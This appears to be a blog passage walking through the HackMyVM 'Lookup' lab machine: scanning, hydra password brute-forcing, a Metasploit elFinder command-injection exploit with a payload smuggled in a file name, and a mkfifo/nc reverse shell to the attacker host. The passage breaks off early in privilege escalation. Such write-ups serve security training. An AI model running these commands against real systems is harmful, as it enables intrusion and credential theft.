{"id":814,"date":"2024-09-23T19:07:47","date_gmt":"2024-09-23T11:07:47","guid":{"rendered":"http:\/\/162.14.82.114\/?p=814"},"modified":"2024-09-23T19:07:47","modified_gmt":"2024-09-23T11:07:47","slug":"hmv-_-lookup","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/814\/09\/23\/2024\/","title":{"rendered":"hmv[-_-]lookup"},"content":{"rendered":"<h1>Lookup<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906953.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906953.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923151238456\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906955.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906955.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923145634925\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ rustscan -a $IP -- -sCV            \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMc4hLykriw3nBOsKHJK1Y6eauB8OllfLLlztbB4tu4c9cO8qyOXSfZaCcb92uq\/Y3u02PPHWq2yXOLPler1AFGVhuSfIpokEnT2jgQzKL63uJMZtoFzL3RW8DAzunrHhi\/nQqo8sw7wDCiIN9s4PDrAXmP6YXQ5ekK30om9kd5jHG6xJ+\/gIThU4ODr\/pHAqr28bSpuHQdgphSjmeShDMg8wu8Kk\/B0bL2oEvVxaNNWYWc1qHzdgjV5HPtq6z3MEsLYzSiwxcjDJ+EnL564tJqej6R69mjII1uHStkrmewzpiYTBRdgi9A3Yb+x8NxervECFhUR2MoR1zD+0UJbRA2v1LQaGg9oYnYXNq3Lc5c4aXz638wAUtLtw2SwTvPxDrlCmDVtUhQFDhyFOu9bSmPY0oGH5To8niazWcTsCZlx2tpQLhF\/gS3jP\/fVw+H6Eyz\/yge3RYeyTv3ehV6vXHAGuQLvkqhT6QS21PLzvM7bCqmo1YIqHfT2DLi7jZxdk=\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJNL\/iO8JI5DrcvPDFlmqtX\/lzemir7W+WegC7hpoYpkPES6q+0\/p4B2CgDD0Xr1AgUmLkUhe2+mIJ9odtlWW30=\n|   256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFG\/Wi4PUTjReEdk2K4aFMi8WzesipJ0bp0iI0FM8AfE\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/lookup.hmv\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer 
(@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.101\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 302) [Size: 0] [--&gt; http:\/\/lookup.hmv]\nProgress: 16555 \/ 441122 (3.75%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 16555 \/ 441122 (3.75%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>The redirect exposes a hostname that needs <code>dns<\/code> resolution, so add a hosts entry:<\/p>\n<pre><code class=\"language-bash\">192.168.10.101    lookup.hmv<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ gobuster dir -u http:\/\/lookup.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/lookup.hmv\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   301,401,403,404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php\n[+] Timeout:                 
10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 719]\n\/login.php            (Status: 200) [Size: 1]\nProgress: 106030 \/ 441122 (24.04%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 106234 \/ 441122 (24.08%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ whatweb http:\/\/lookup.hmv                     \nhttp:\/\/lookup.hmv [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.41 (Ubuntu)], IP[192.168.10.101], PasswordField[password], Title[Login Page]<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906956.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906956.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923150112941\" \/><\/div><\/p>\n<p>A wrong password triggers a redirect, so capture the request:<\/p>\n<pre><code class=\"language-bash\">POST \/login.php HTTP\/1.1\nHost: lookup.hmv\nContent-Length: 35\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 
1\nOrigin: http:\/\/lookup.hmv\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/lookup.hmv\/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nusername=username&amp;password=password<\/code><\/pre>\n<p>Tried SQL injection, but without success.<\/p>\n<h3>Fuzzing Domain Names<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ ffuf -c -u http:\/\/$IP -H &quot;Host: FUZZ.Lookup.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fs 0 \n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.10.101\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: FUZZ.Lookup.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\nwww                     [Status: 200, Size: 719, Words: 114, Lines: 27, Duration: 7ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 7142 
req\/sec :: Duration: [0:00:05] :: Errors: 0 ::<\/code><\/pre>\n<p>Nothing useful so far.<\/p>\n<h3>Brute-Force Attempt<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl -s -i http:\/\/lookup.hmv -X POST -d &quot;username=username&amp;password=password&quot; \nHTTP\/1.1 200 OK\nDate: Mon, 23 Sep 2024 07:21:13 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 719\nContent-Type: text\/html; charset=UTF-8\n\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n  &lt;meta charset=&quot;UTF-8&quot;&gt;\n  &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n  &lt;title&gt;Login Page&lt;\/title&gt;\n  &lt;link rel=&quot;stylesheet&quot; href=&quot;styles.css&quot;&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n  &lt;div class=&quot;container&quot;&gt;\n    &lt;form action=&quot;login.php&quot; method=&quot;post&quot;&gt;\n      &lt;h2&gt;Login&lt;\/h2&gt;\n      &lt;div class=&quot;input-group&quot;&gt;\n        &lt;label for=&quot;username&quot;&gt;Username&lt;\/label&gt;\n        &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; required&gt;\n      &lt;\/div&gt;\n      &lt;div class=&quot;input-group&quot;&gt;\n        &lt;label for=&quot;password&quot;&gt;Password&lt;\/label&gt;\n        &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; required&gt;\n      &lt;\/div&gt;\n      &lt;button type=&quot;submit&quot;&gt;Login&lt;\/button&gt;\n    &lt;\/form&gt;\n  &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl -s -i http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=username&amp;password=password&quot; \nHTTP\/1.1 200 OK\nDate: Mon, 23 Sep 2024 07:21:34 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nRefresh: 3; url=http:\/\/lookup.hmv\nVary: 
Accept-Encoding\nContent-Length: 74\nContent-Type: text\/html; charset=UTF-8\n\nWrong username or password. Please try again.&lt;br&gt;Redirecting in 3 seconds.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl -s http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=admin&amp;password=root&quot;\nWrong password. Please try again.&lt;br&gt;Redirecting in 3 seconds.<\/code><\/pre>\n<p>Try brute-forcing with <code>hydra<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt -f lookup.hmv http-post-form &quot;\/login.php:username=^USER^&amp;password=^PASS^:Wrong password&quot; \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-23 05:37:07\n[WARNING] Restorefile (you have 10 seconds to abort... 
(use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/lookup.hmv:80\/login.php:username=^USER^&amp;password=^PASS^:Wrong password\n[80][http-post-form] host: lookup.hmv   login: admin   password: password123\n[STATUS] attack finished for lookup.hmv (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-23 05:37:37<\/code><\/pre>\n<p>Take a closer look at this address:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=admin&amp;password=aaaa&quot;\nWrong password. Please try again.&lt;br&gt;Redirecting in 3 seconds.                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ curl http:\/\/lookup.hmv\/login.php -X POST -d &quot;username=admin&amp;password=password123&quot;\nWrong username or password. 
Please try again.&lt;br&gt;Redirecting in 3 seconds.<\/code><\/pre>\n<p>This shows the username is wrong, so brute-force again:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ hydra -p password123 -L \/usr\/share\/wordlists\/rockyou.txt -f lookup.hmv http-post-form &quot;\/login.php:username=^USER^&amp;password=^PASS^:Wrong username&quot; \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-23 05:40:21\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399\/p:1), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/lookup.hmv:80\/login.php:username=^USER^&amp;password=^PASS^:Wrong username\n[STATUS] 4455.00 tries\/min, 4455 tries in 00:01h, 14339944 to do in 53:39h, 16 active\n[80][http-post-form] host: lookup.hmv   login: jose   password: password123\n[STATUS] attack finished for lookup.hmv (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-23 05:43:10<\/code><\/pre>\n<p>This gives the username and password:<\/p>\n<pre><code class=\"language-text\">jose\npassword123<\/code><\/pre>\n<p>Logging in redirects to:<\/p>\n<pre><code class=\"language-bash\">http:\/\/files.lookup.hmv\/<\/code><\/pre>\n<h3>Exploitation<\/h3>\n<p>But there is nothing there, so try other vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906957.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906957.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175322323\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Right-click to upload a file:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906958.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906958.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175611169\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906959.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906959.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175644736\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>After renaming it to <code>jpg<\/code>, the upload succeeded!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906960.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906960.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923175839179\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Better to just use a known exploit directly. 
Sigh, the other vulnerabilities could not be exploited, so try the msf exploit module:<\/p>\n<pre><code class=\"language-bash\">\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Lookup]\n\u2514\u2500$ msfconsole -q                \nmsf6 &gt; search elfinder\n\nMatching Modules\n================\n\n   #  Name                                                               Disclosure Date  Rank       Check  Description\n   -  ----                                                               ---------------  ----       -----  -----------\n   0  exploit\/multi\/http\/builderengine_upload_exec                       2016-09-18       excellent  Yes    BuilderEngine Arbitrary File Upload Vulnerability and execution\n   1  exploit\/unix\/webapp\/tikiwiki_upload_exec      
                     2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability\n   2  exploit\/multi\/http\/wp_file_manager_rce                             2020-09-09       normal     Yes    WordPress File Manager Unauthenticated Remote Code Execution\n   3  exploit\/linux\/http\/elfinder_archive_cmd_injection                  2021-06-13       excellent  Yes    elFinder Archive Command Injection\n   4  exploit\/unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection\n\nInteract with a module by name or index. For example info 4, use 4 or use exploit\/unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection\n\nmsf6 &gt; use 4\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; options\n\nModule options (exploit\/unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection):\n\n   Name       Current Setting  Required  Description\n   ----       ---------------  --------  -----------\n   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                      yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT      80               yes       The target port (TCP)\n   SSL        false            no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI  \/elFinder\/       yes       The base path to elFinder\n   VHOST                       no        HTTP server virtual host\n\nPayload options (php\/meterpreter\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  
----\n   0   Auto\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; set LHOST 192.168.10.102\nLHOST =&gt; 192.168.10.102\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; set rhosts 192.168.10.101\nrhosts =&gt; 192.168.10.101\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; set vhost files.lookup.hmv\nvhost =&gt; files.lookup.hmv\nmsf6 exploit(unix\/webapp\/elfinder_php_connector_exiftran_cmd_injection) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.102:4444 \n[*] Uploading payload &#039;cXiio3.jpg;echo 6370202e2e2f66696c65732f635869696f332e6a70672a6563686f2a202e527731696234352e706870 |xxd -r -p |sh&amp; #.jpg&#039; (1955 bytes)\n[*] Triggering vulnerability via image rotation ...\n[*] Executing payload (\/elFinder\/php\/.Rw1ib45.php) ...\n[*] Sending stage (39927 bytes) to 192.168.10.101\n[+] Deleted .Rw1ib45.php\n[*] Meterpreter session 1 opened (192.168.10.102:4444 -&gt; 192.168.10.101:54334) at 2024-09-23 06:02:47 -0400\n[*] No reply\n[*] Removing uploaded file ...\n[+] Deleted uploaded file\n\nmeterpreter &gt; shell\nProcess 6973 created.\nChannel 0 created.\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)<\/code><\/pre>\n<p>Got a shell!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2&gt;&amp;1|nc 192.168.10.102 1234 &gt;\/tmp\/f<\/code><\/pre>\n<p>Hand the shell over to pwncat:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906961.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409231906961.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240923180820216\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@lookup:\/var\/www\/files.lookup.hmv\/public_html\/elFinder\/php$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/usr\/bin\/bash\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nthink:x:1000:1000:,,,:\/home\/think:\/bin\/bash\nfwupd-refresh:x:113:117:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\n(remote) www-data@lookup:\/var\/www\/files.lookup.hmv\/public_html\/elFinder\/php$ ls \/home\nthink\n(remote) www-data@lookup:\/var\/www\/files.lookup.hmv\/public_html\/elFinder\/php$ cd \/home\/think\n(remote) www-data@lookup:\/home\/think$ ls -la\ntotal 40\ndrwxr-xr-x 5 think think 4096 Jan 11  2024 .\ndrwxr-xr-x 3 root  root  4096 Jun  2  2023 ..\nlrwxrwxrwx 1 root  root     9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rwxr-xr-x 1 think think  220 Jun  2  2023 .bash_logout\n-rwxr-xr-x 1 think think 3771 Jun  2  2023 .bashrc\ndrwxr-xr-x 2 think think 4096 Jun 21  2023 .cache\ndrwx------ 3 think think 4096 Aug  9  2023 .gnupg\n-rw-r----- 1 root  think  525 Jul 30  2023 .passwords\n-rwxr-xr-x 1 think think  807 Jun  2  2023 